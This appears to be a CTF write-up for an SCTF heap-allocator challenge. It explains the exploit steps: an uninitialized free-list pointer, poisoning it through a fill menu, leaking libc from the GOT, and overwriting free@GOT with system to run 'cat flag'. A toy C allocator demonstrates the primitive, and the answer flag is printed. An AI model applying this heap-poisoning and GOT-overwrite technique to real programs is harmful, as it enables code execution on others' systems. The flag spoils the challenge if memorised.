I made a new heap allocator.
Would you test this one?
(service address)
(binary & libc download link)
In the deploy folder:
# ./run.sh
- When a new heap chunk is created, its next pointer is not initialized.
- Through the fill menu (4), the attacker can create a free chunk. When the bin size equals the size of the chunk struct, the written data is laid over the freed chunk's metadata, so the attacker controls the next pointer of that chunk.
- With fake chunk metadata, the next pointer can be pointed at the GOT: leak the libc base from a GOT entry, then overwrite the GOT.
- Overwrite the GOT entry of free with the address of system (computed from the given libc), so that freeing a chunk whose contents are "cat flag" runs system("cat flag").
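The free-list poisoning the writeup relies on, as an added example that is not the challenge binary or its allocator. It is a toy allocator written to match the description: the singly linked free list keeps its next pointer in-band in the freed chunk's data, fresh chunks leave that word uninitialized, and a "fill" write into a freed chunk overwrites the pointer. The GOT is stood in for by a local array (`fake_got`), and the libc free address, the symbol offset and the system address are constructed constants, not values from the real target.

```c
// Toy free-list allocator modelled on the writeup (assumption: not the challenge code).
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CHUNK_DATA  32
#define POOL_CHUNKS 8

// The free list is kept in-band: `next` occupies the first 8 bytes of a freed chunk.
struct chunk {
    union {
        struct chunk *next;              // meaningful only while on the free list
        unsigned char data[CHUNK_DATA];  // user data while allocated
    } u;
};

static struct chunk pool[POOL_CHUNKS];
static struct chunk *free_head;
static size_t pool_used;

static void toy_init(void) {
    memset(pool, 0, sizeof pool);
    free_head = NULL;
    pool_used = 0;
}

// Pop from the free list, else carve a fresh chunk from the pool.
// The bug: the in-band next pointer is trusted without any check.
static void *toy_malloc(void) {
    if (free_head) {
        struct chunk *c = free_head;
        free_head = c->u.next;           // attacker-controlled after a fill on a freed chunk
        return c;
    }
    if (pool_used >= POOL_CHUNKS) return NULL;
    return &pool[pool_used++];           // next pointer left uninitialized, as in the writeup
}

static void toy_free(void *p) {
    struct chunk *c = p;
    c->u.next = free_head;
    free_head = c;
}

// "fill" menu: copies attacker bytes into a chunk; the handle stays usable after free.
static void toy_fill(void *p, const void *src, size_t n) {
    memcpy(p, src, n < CHUNK_DATA ? n : CHUNK_DATA);
}

// Stand-in for the GOT: slot 0 plays free@GOT. All three values are constructed.
static uint64_t fake_got[CHUNK_DATA / sizeof(uint64_t)];
#define FAKE_LIBC_FREE   0x7f0000012345ULL   // what free@GOT would hold after lazy binding
#define FAKE_FREE_OFFSET 0x12345ULL          // offset of free inside the assumed libc
#define FAKE_SYSTEM      0x4141414141414141ULL

// Poison the free list so the second allocation lands on `target`.
// Returns the chunk overlapping `target`, or NULL if the pool is exhausted.
static void *poison_to_target(void *target) {
    toy_init();
    void *a = toy_malloc();
    void *b = toy_malloc();
    if (!a || !b) return NULL;
    toy_free(a);                         // free list: a -> NULL
    toy_free(b);                         // free list: b -> a -> NULL
    uintptr_t t = (uintptr_t)target;
    toy_fill(b, &t, sizeof t);           // overwrite b's in-band next pointer
    (void)toy_malloc();                  // pops b; free_head is now `target`
    // Popping `target` loads its first word as the new free_head, so no further
    // toy_malloc() may be issued after this point without crashing the allocator.
    return toy_malloc();
}

// Leak: read free@GOT through the fake chunk and subtract the symbol offset.
static uint64_t leak_libc_base(void) {
    fake_got[0] = FAKE_LIBC_FREE;
    void *slot = poison_to_target(fake_got);
    if (!slot) return 0;
    uint64_t leaked;
    memcpy(&leaked, slot, sizeof leaked);
    return leaked - FAKE_FREE_OFFSET;
}

// Overwrite: write the "system" address into free@GOT through the same fake chunk.
static int overwrite_got_free(void) {
    fake_got[0] = FAKE_LIBC_FREE;
    void *slot = poison_to_target(fake_got);
    if (!slot) return 0;
    uint64_t sys = FAKE_SYSTEM;
    toy_fill(slot, &sys, sizeof sys);
    return fake_got[0] == FAKE_SYSTEM;
}

int main(void) {
    printf("leaked libc base: 0x%llx\n", (unsigned long long)leak_libc_base());
    printf("free@GOT overwritten: %s\n", overwrite_got_free() ? "yes" : "no");
    return 0;
}
```

Two allocations of the poisoned bin are needed because the first one only pops the chunk whose pointer was corrupted; the second returns the forged address. Against the real target, the address written into the next pointer is free@GOT from the binary, and the leak plus the given libc gives the system address to write back.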
SCTF{H4v3_y0u_ev3r_seen_CowBoy_B1B0P?}